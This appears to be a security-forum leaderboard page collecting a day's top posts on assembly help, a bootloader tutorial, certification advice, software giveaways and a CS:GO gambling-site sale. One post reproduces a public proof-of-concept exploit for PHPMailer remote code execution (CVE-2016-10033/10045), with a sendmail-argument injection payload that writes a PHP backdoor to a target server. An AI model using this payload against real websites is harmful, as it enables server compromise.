Leaderboard

Popular Content

Showing content with the highest reputation on 12/28/16 in all areas

  1. It's not at fault, it's just optimizing the code. MrGrj says: project properties -> build -> "optimize code". Or, if you really insist, edit the executable file with OllyDbg and put mov edx, dword ptr[0x8CCE6C] there instead of: mov edx, plm.exe+4CCE6C
    3 points
  2. An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class. The first patch of the vulnerability CVE-2016-10033 was incomplete. This advisory demonstrates the bypass of the patch.

     ```
     usage = """
     Usage:

     Full Advisory:
     https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
     https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt

     PoC Video:
     https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

     Disclaimer:
     For testing purposes only. Do no harm.
     """

     import time
     import urllib
     import urllib2
     import socket
     import sys

     RW_DIR = "/var/www/html/uploads"

     url = 'http://VictimWebServer/contact_form.php' # Set destination URL here

     # Choose/uncomment one of the payloads:

     # PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
     #payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR

     # Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
     payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR

     ######################################

     # PHP code to be saved into the backdoor php file on the target in RW_DIR
     RCE_PHP_CODE = "<?php phpinfo(); ?>"

     post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}

     # Attack
     data = urllib.urlencode(post_fields)
     req = urllib2.Request(url, data)
     response = urllib2.urlopen(req)
     the_page = response.read()
     ```

     More information here
    3 points
  3. Hello! I'm working on a small program and I've run into a problem I can't figure out, so I thought I might get a helping hand here. I have an executable without source code which at some point executes the opcode:

     ```
     mov edx,[plm.exe+4CCE6C]
     ```

     What I want to do is reproduce this instruction in a DLL that I load into the executable mentioned above. My knowledge of ASM (which is below sea level) helped me rewrite some small pieces of the executable's memory so that it does a jmp into a naked function in my DLL, but from there I have to write that opcode in my function and I really have no idea how. The base address is constant, so I know what the final address is (0x400000+0x4CCE6C = 0x8CCE6C). I tried:

     ```
     // variant 1:
     __asm {
         mov edx, [0x8CCE6C]
     }

     // variant 2:
     __asm {
         mov edx, dword ptr[0x8CCE6C]
     }
     ```

     But when I checked the code in the debugger, the compiler had removed the dereference (I think that's what those square brackets around the address are called), and the final instruction looks like this in both cases:

     ```
     mov edx, plm.exe+4CCE6C
     ```

     If possible, can you explain what I'm doing wrong?

     ------------------------------

     // EDIT: I managed to pull off a trick, namely I push eax onto the stack, write the address into eax, do that move and then pop eax from the stack:

     ```
     __asm {
         push eax
         mov eax, 0x8CCE6C
         mov edx, [eax]
         pop eax
     }
     ```

     Still, what is wrong with my first 2 examples, and is there no way to execute that instruction without using an extra register?
    2 points
  4. It might be from being stuck at home with nothing to do over break, or it might be from an actual interest in low-level systems design, but I've taken it upon myself to learn more about OS implementation, starting with the bootloader. So, here we go. All of this information exists in various other places on the web, but there's no better way to learn than by teaching, right? Either way, this piece should serve as a primer on what exactly a bootloader does and how to implement a relatively simple one (compared to a beast like GRUB which is ostensibly its own little operating system). The full tutorial
    2 points
  5. They have some guides there. It's best to study on your own and take the tests. Some are free, others cost money (symbolic amounts). As far as I know, they send the certificates anywhere for a fee of 15 dollars.
    1 point
  6. @CrazyTank is right. The exams are taken at VUE centers, cost 150 euro, and you can take them anytime. If you can wait until next year, you can enroll at Poli, for LPIC, and take the exam for 50 euro, but it's on a fixed date; it's held twice a year, I think. See here: http://www.lpic.ro/wiki/ and https://learn.ccna.ro/ I don't recommend going to the courses; study on your own. At Poli at least, the courses are taught by some young students from Automatica si Calculatoare, members of ROSEdu. The certifications are internationally recognized and valid for 5 years. That is, you get LPIC-101 and it will be valid for 5 years, then you prepare for LPIC-102 and get that one, and it will be valid for another 5 years... I'll make courses etc. available to you after the holidays; send me a private message so I don't forget. All the best!
    1 point
  7. Post a listing on localbitcoins.com, because at the moment nobody exchanges PSC - BTC in Romania. You have a bigger market and an escrow service, a reputation system, etc. Admittedly, you also have competition in other countries, where others buy at 25%-35%.
    1 point
  8. Hi. In general, China = poor quality, cheap = bad.
    1 point
  9. Live: https://streaming.media.ccc.de/33c3 Schedule: https://fahrplan.events.ccc.de/congress/2016/Fahrplan/schedule.html Videos: https://media.ccc.de/c/33c3
    1 point
  10. WonderFox, together with 15+ other well-known software developers, is offering us a mega gift worth 1000 dollars.

      First round (valid before December 27)
      - IObit Driver Booster 4 PRO
      - Ashampoo Home Designer Pro 3
      - Ad-Aware Antivirus Pro
      - Heimdal Pro 6-Month
      - MailWasher Pro
      - Process Lasso Pro
      - HD Video Converter Factory Pro
      - DVD Video Converter
      - Watermark Software

      Second round (December 28 - January 07, 2017)
      Sticky Password, EaseUs, MiniTool, Adguard, Epubor, Zemana, etc...

      The promotional page can be found here: http://www.videoconverterfactory.com/christmas/ All we have to do is choose the desired program and download the archive; inside it we will find the installation kit plus the serial for registering the program. Promotion valid until January 07, 2017.
    1 point
  11. https://www.stickypassword.com/lp/giveawayclub2016 Enter a random email address and you receive a premium license for 1 year; the program is very good for managing passwords for various accounts. Sticky Password Premium ( 1 user / 1 year )
    1 point
  12. 1 point
  13. Selling CSGO jackpot site
      - Domain valid for 1 year
      - VPS from digitalocean valid for another 2 months
      - Functional bot
      - Jackpot script without bugs
      - I can teach you some tricks on the site

      I offer FULL access to the site; for the link to the site, PM or contact skype: leviberlin2 PRICE: 30$ URGENT
    -1 points